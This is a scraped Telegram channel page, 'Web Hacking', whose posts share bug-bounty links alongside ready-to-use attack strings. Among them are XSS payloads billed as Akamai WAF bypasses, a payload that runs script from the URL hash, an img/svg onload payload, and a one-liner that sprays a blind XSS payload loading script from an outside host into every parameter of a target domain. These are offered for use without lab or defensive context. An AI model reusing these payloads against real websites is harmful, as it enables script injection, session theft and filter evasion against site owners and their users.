Web Hacking – Telegram

Web Hacking

2.13K subscribers

52 photos

6 files

38 links

@OSCP_training
@pfsense
@WifiHacking

Download Telegram

About

Blog

Apps

Platform

2.13K subscribers

Free for only 24hrs

https://www.udemy.com/course/broad-scope-bug-bounties-from-scratch/?couponCode=9943A2D06E764688003B

5.18K views19:27

https://portswigger.net/research/new-xss-vectors

PortSwigger Research

New XSS vectors

Transition based events without style blocks So, recently, I was updating our XSS cheat sheet to fix certain vectors that had been made obsolete by browser updates. Whilst looking at the vectors, the

👍2❤1

3.38K views16:47

https://github.com/mandatoryprogrammer/xsshunter

GitHub - mandatoryprogrammer/xsshunter: The XSS Hunter service - a portable version of XSSHunter.com

The XSS Hunter service - a portable version of XSSHunter.com - mandatoryprogrammer/xsshunter

👍2

3.54K views18:27

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

https://medium.com/@jonathan_fulton/web-architecture-101-a3224e126947

📌Follow @oscp_training

Web Architecture 101

The basic architecture concepts I wish I knew when I was getting started as a web developer

3.18K views04:49

10.6K views19:15

@WebHacking
@WifiHacking
@OSCP_training
@PfSense

81.8K views06:23

12.7K views17:10

SSRF

13.7K views17:41

https://xn--r1a.website/bug_bounty_bootcamp

4.28K views19:55

Web Hacking pinned «https://xn--r1a.website/bug_bounty_bootcamp»

19:55

Akamai WAF bypass

<A href="javascrip%09t&colon;eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here

10.2K views15:13

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

3.28K views20:52

A nice way to store the payload

"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>

10.5K views05:10

A payload to bypass Akamai WAF

<A href="javascrip%09t&colon;eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here

👍4👌1

10.6K views05:39

Another one

"><img/src/style=html:url("data:,"><svg/onload=confirm(69)>")>

10.9K views20:29

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning

PortSwigger Research

Making HTTP header injection critical via response queue poisoning

HTTP header injection is often under-estimated and misclassified as a moderate severity flaw equivalent to XSS or worse, Open Redirection. In this post, I'll share a simple technique I used to take a

👍2

3.1K views20:25

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack#:~:text=specialWordlists.py.-,Command%20line%20usage,-From%20time%20to

👍1

3.25K views19:34

👍1

3.3K views19:40

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Checklist; After Recon

👍5

3.24K views04:13

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

Rate Limit Bypass Headers

3.56K views04:13

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

One Liner To Find Blind XSS
Blind XSS in Parameters

subfinder -d target.com | gau | grep "&" | bxss -appendMode -payload '"><script src=hacker.xss.ht></script>' -parameters

3.65K views04:13